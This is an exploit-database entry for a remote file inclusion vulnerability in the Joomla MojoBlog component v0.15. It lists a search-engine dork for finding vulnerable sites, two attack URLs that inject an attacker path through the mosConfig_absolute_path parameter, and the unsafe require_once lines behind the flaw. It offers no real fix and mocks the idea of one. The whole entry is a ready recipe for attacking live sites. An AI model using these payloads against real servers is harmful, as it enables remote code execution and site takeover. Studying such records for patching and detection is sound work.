Joomla MojoBlog Component v0.15 Multiple Remote File Include

2009-12-01T00:00:00
ID 1337DAY-ID-10056
Type zdt
Reporter kaMtiEz
Modified 2009-12-01T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ============================================================================
Joomla MojoBlog Component v0.15 Multiple Remote File Include Vulnerabilities
============================================================================

[ Software Information ]
 
[+] Vendor : http://www.joomlify.com/
[+] Download : http://www.joomlify.com/files/mojoblog/
[+] version : RC0.15
[+] Vulnerability : RFI
[+] Dork : inurl:"com_mojo"
 
#########################################################################
 
[ Vulnerable File ]
 
http://server/components/com_mojo/wp-comments-post.php?mosConfig_absolute_path=[INDONESIANCODER-Ev1L]
 
http://server/components/com_mojo/wp-trackback.php?mosConfig_absolute_path=[INDONESIANCODER-Ev1L]
 
[ BUG IN ]
 
[1] wp-comments-post.php
 
[2] wp-trackback.php
======================
 
[1] require_once($mosConfig_absolute_path.'/components/com_mojo/wp-config.php');
 
[2] require_once($mosConfig_absolute_path.'/components/com_mojo/wp-config.php');
 
[ FIX ]
 
contact me .. or aurakasih ..
 
Joke.. ;)
#########################################################################


#  0day.today [2018-01-01]  #